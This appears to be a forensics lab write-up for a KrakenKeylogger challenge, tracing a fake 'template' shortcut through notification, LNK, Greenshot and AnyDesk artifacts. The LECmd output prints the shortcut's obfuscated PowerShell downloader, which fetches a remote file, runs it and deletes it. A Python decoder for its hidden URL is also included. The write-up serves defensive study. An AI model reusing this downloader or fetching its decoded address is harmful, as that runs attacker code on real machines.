Disk Analysis
An employee at a large company was assigned a task with a two-day deadline. Realizing that he could not complete the task in that timeframe, he sought help from someone else. After one day, he received a notification from that person, who informed him that he had managed to finish the assignment and had sent it to the employee as a test. However, the person also sent a message to the employee stating that if he wanted the completed assignment, he would have to pay $160.
The helper’s demand for payment revealed that he was a threat actor. The company’s digital forensics team was called in to investigate and identify the attacker, determine the extent of the attack, and assess potential data breaches. The team must analyze the employee’s computer and communication logs to prevent similar attacks in the future.

A messaging app installed on a host pushes its alerts through the Windows notification platform, which stores them on disk. So we can analyze the notification database wpndatabase.db, located in
\Users\OMEN\AppData\Local\Microsoft\Windows\Notifications, using SQLite:
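One way to pull the messaging-app toasts out of wpndatabase.db, as an added example that is not part of the original writeup. It assumes a subset of the database's Notification and NotificationHandler tables (ArrivalTime as a Windows FILETIME, Payload as toast XML) and builds a constructed in-memory stand-in so it runs offline; point sqlite3.connect at the real file to use it on the evidence.

```python
import sqlite3
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Assumed subset of the wpndatabase.db schema: each Notification row points at a
# NotificationHandler row whose PrimaryId names the app that raised the toast.
SCHEMA = """
CREATE TABLE NotificationHandler (RecordId INTEGER PRIMARY KEY, PrimaryId TEXT, HandlerType TEXT);
CREATE TABLE Notification (Id INTEGER PRIMARY KEY, HandlerId INTEGER, Type TEXT,
                           Payload BLOB, ArrivalTime INTEGER);
"""

def filetime_to_utc(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01) -> timezone-aware UTC datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def toast_text(payload):
    """Flatten every <text> element of a toast XML payload into one string."""
    root = ET.fromstring(payload)
    return " | ".join((t.text or "").strip() for t in root.iter("text"))

def app_notifications(conn, app_substring):
    """Return (arrival_utc, app, text) for each toast whose handler name matches."""
    rows = conn.execute(
        "SELECT n.ArrivalTime, h.PrimaryId, n.Payload FROM Notification n "
        "JOIN NotificationHandler h ON h.RecordId = n.HandlerId "
        "WHERE n.Type = 'toast' AND h.PrimaryId LIKE ? ORDER BY n.ArrivalTime",
        (f"%{app_substring}%",))
    return [(filetime_to_utc(ft), app, toast_text(payload)) for ft, app, payload in rows]

def build_sample_db():
    """Constructed in-memory stand-in for the real wpndatabase.db (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO NotificationHandler VALUES (1, 'TelegramDesktop', 'app')")
    conn.execute("INSERT INTO NotificationHandler VALUES (2, 'Windows.SystemToast.Update', 'system')")
    toast = (b"<toast><visual><binding template='ToastGeneric'>"
             b"<text>Helper</text><text>Archive password: EXAMPLE-PASS</text>"
             b"</binding></visual></toast>")
    conn.execute("INSERT INTO Notification VALUES (1, 1, 'toast', ?, 133688000000000000)", (toast,))
    conn.execute("INSERT INTO Notification VALUES (2, 2, 'tile', ?, 133688000000000000)", (b"<tile/>",))
    return conn

if __name__ == "__main__":
    for when, app, text in app_notifications(build_sample_db(), "Telegram"):
        print(when.isoformat(), app, text)
```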

We find the user was using Telegram.
Clicking on the row we found earlier, we get the complete notification, which contains the password:

Analyzing the LNK file using LECmd.exe:
.\LECmd.exe -f "C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk"
We get the following result:
LECmd version 1.5.1.0
Author: Eric Zimmerman ([email protected])
https://github.com/EricZimmerman/LECmd
Command line: -f C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
Warning: Administrator privileges not found!
Processing C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
Source file: C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
Source created: 2025-08-19 18:29:35
Source modified: 2023-05-11 02:46:14
Source accessed: 2025-08-19 18:37:03
--- Header ---
Target created: null
Target modified: null
Target accessed: null
File size (bytes): 0
Flags: HasTargetIdList, HasRelativePath, HasArguments, HasIconLocation, IsUnicode, HasExpIcon
File attributes: 0
Icon index: 67
Show window: SwShowminnoactive (Display the window as minimized without activating it.)
Relative Path: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Arguments: -ExecutionPolicy UnRestricted $ProgressPreference = 0;
function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')};
function sDjLksFILdkrdR($OnUPXhNfGyEh){
$vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh;
for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){
try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)}
catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb};
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';
$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1];
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing;
[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi);
& $cDkdhkGBtl;
sleep 3;
rm $cDkdhkGBtl;
Icon Location: C:\Windows\System32\imageres.dll
--- Target ID information (Format: Type ==> Value) ---
Absolute path: This PC\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-Root folder: GUID ==> This PC
-Drive letter ==> C:
-Directory ==> Windows
Short name: Windows
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: Windows
Created:
Last access:
-Directory ==> System32
Short name: System32
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: System32
Created:
Last access:
-Directory ==> WindowsPowerShell
Short name: WindowsPowerShell
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: WindowsPowerShell
Created:
Last access:
-Directory ==> v1.0
Short name: v1.0
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: v1.0
Created:
Last access:
-File ==> powershell.exe
Short name: powershell.exe
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: powershell.exe
Created:
Last access:
--- End Target ID information ---
--- Extra blocks information ---
>> Icon environment data block
Icon path: %SystemRoot%\System32\imageres.dll
>> Special folder data block
Special Folder ID: 37
>> Known folder data block
Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System
>> Property store data block (Format: GUID\ID Description ==> Value)
46588ae2-4cbc-4338-bbfc-139326986dce\4 SID ==> S-1-5-21-66729632-1778321671-188542082-1001
We find the domain here; however, we need to decode it:
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';
To decode it, we should reverse the obfuscated string, then swap the two characters in each 2-char chunk (the helper nvRClWiAJT reverses a string, and sDjLksFILdkrdR applies it to the whole string and then to each chunk; the catch branch keeps a trailing single character as-is).
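The decoder below is an added example, not the original writeup's code: it mirrors the LNK's two PowerShell helpers in Python, takes the obfuscated string exactly as it appears in the LECmd output, and also includes a constructed inverse transform so the decoder can be checked against odd-length inputs (the catch branch).

```python
def reverse_string(s):
    """Mirror of the LNK's nvRClWiAJT helper: reverse the whole string."""
    return s[::-1]

def decode_lnk_string(obfuscated):
    """Mirror of sDjLksFILdkrdR: reverse the string, then swap the two characters
    of every 2-char chunk. A trailing single character is appended unchanged,
    which is what the PowerShell catch branch does when Substring(i,2) throws."""
    reversed_once = reverse_string(obfuscated)
    out = []
    for i in range(0, len(reversed_once), 2):
        out.append(reverse_string(reversed_once[i:i + 2]))  # 1-char chunk stays as-is
    return "".join(out)

def encode_lnk_string(plain):
    """Constructed inverse (not in the LNK): swap each 2-char chunk, then reverse.
    Used only to confirm the decoder round-trips on inputs of either parity."""
    chunks = [plain[i:i + 2][::-1] for i in range(0, len(plain), 2)]
    return "".join(chunks)[::-1]

# The argument to sDjLksFILdkrdR, copied from the LECmd output on this page.
OBFUSCATED_URL = 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'

if __name__ == "__main__":
    url = decode_lnk_string(OBFUSCATED_URL)
    # Defang before it goes into a report so the staging URL is not clickable.
    print(url.replace("http", "hxxp").replace(".", "[.]"))
```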
The next question asks about LOLAPPS. Searching for LOLAPPS, we find the following list:

We need to know which app was installed on the host. Looking at AppData\Roaming, we find Greenshot:

Opening the folder, we find a .ini file:

Inside the file, we find the command:
The complete command is recorded in the same file:

In the Videos folder, we find that AnyDesk was installed:

Since the attacker used AnyDesk, we can analyze the ad.trace file:

Inside ad.trace, we find the IP:
